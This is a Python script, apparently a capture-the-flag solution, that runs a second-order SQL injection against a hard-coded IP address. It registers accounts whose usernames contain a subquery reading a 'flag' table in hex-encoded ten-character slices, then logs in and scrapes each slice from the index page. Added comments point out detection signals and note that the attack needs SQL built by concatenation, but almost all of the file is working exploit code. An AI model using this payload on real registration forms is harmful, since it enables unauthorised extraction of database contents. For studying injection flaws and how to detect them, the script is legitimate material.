import re

import requests
# Base address of the application the script talks to. It is hard-coded, so
# the script only makes sense against that one instance (the query built in
# payload() reads a table named "flag", which suggests a CTF-style exercise;
# the page does not say so explicitly).
url = "http://111.198.29.45:54295/"

# A single session is reused so that cookies set by login.php are sent with
# the following index.php request.
r = requests.Session()

# Browser-like request headers. The misspelled name "hearders" is kept as is
# because the request loop refers to it by that name.
hearders = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
    "Referer": "http://111.198.29.45:54295/register.php",
    "Content-Type": "application/x-www-form-urlencoded",
    "Host": "111.198.29.45:54295",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Upgrade-Insecure-Requests": "1",
    "Connection": "close",
}

# Captures the text on the line that follows the literal `name">` and a
# newline, up to the last "<" on that line ("." does not match a newline).
pattern = re.compile(r'name">\n(.*)<')
def payload(i):
    """Build the registration form fields for slice number ``i``.

    The ``username`` value is not a name but a SQL fragment: a quote, an
    encoded ``+`` (``%2B``), and a subquery that takes a 10-character
    substring, starting at position ``i * 10 + 1``, of the doubly
    hex-encoded contents of a table called ``flag``.

    A registration handler that binds ``username`` as a query parameter
    stores this text verbatim and never evaluates it; it is only
    meaningful against code that concatenates the field into SQL.

    Args:
        i: Zero-based slice index; also offsets the e-mail local part
            (``i + 10``) so every form uses a distinct address.

    Returns:
        A dict with the keys ``email``, ``username`` and ``password``.
    """
    start = i * 10 + 1
    return {
        "email": "{}@a.a".format(i + 10),
        "username": "0'%2B(select substr(hex(hex((select * from flag))) from {} for 10))%2B'0".format(start),
        "password": "sa",
    }
# Ten registration forms, one per 10-character slice (see payload()).
registDict = [payload(i) for i in range(10)]

# Accumulates the text read back from index.php, slice by slice.
flag = ""

# Flow per slice: register -> log in as that account -> read index.php and
# take whatever the page shows after `name">`.
#
# Review notes (defensive):
# - The script expects the page to show an evaluated value rather than the
#   literal username text. That can only happen if the server concatenates
#   the username into a SQL statement somewhere; with bound parameters the
#   page would show the literal text instead.
# - Server-side this appears as a burst of registrations with sequential
#   numeric e-mail local parts and usernames containing quotes and SQL
#   keywords, which is a usable detection signal.
# - The PHPSESSID below is a hard-coded session identifier taken from the
#   page as published.
try:
    for i in range(10):
        form = registDict[i]
        r.headers.update(hearders)
        reply = r.post(
            url + "register.php",
            data=form,
            headers=hearders,
            cookies={"PHPSESSID": "l2vegj57h3fvbm5bgrkm3kvcj0"},
        )
        if reply.status_code != 302:
            # Message text means "registration failed".
            print("注册失败{}".format(form))
            continue
        r.post(
            url + "login.php",
            data={"email": form['email'], "password": form['password']},
        )
        page = r.get(url + "index.php")
        # No guard for a missing match: .group() raises AttributeError if
        # the pattern is not found, exactly as in the original.
        piece = pattern.search(page.text).group(1).strip()
        flag += piece
        print(flag)
except requests.RequestException as err:
    # Network-level failures are printed and end the run.
    print(err)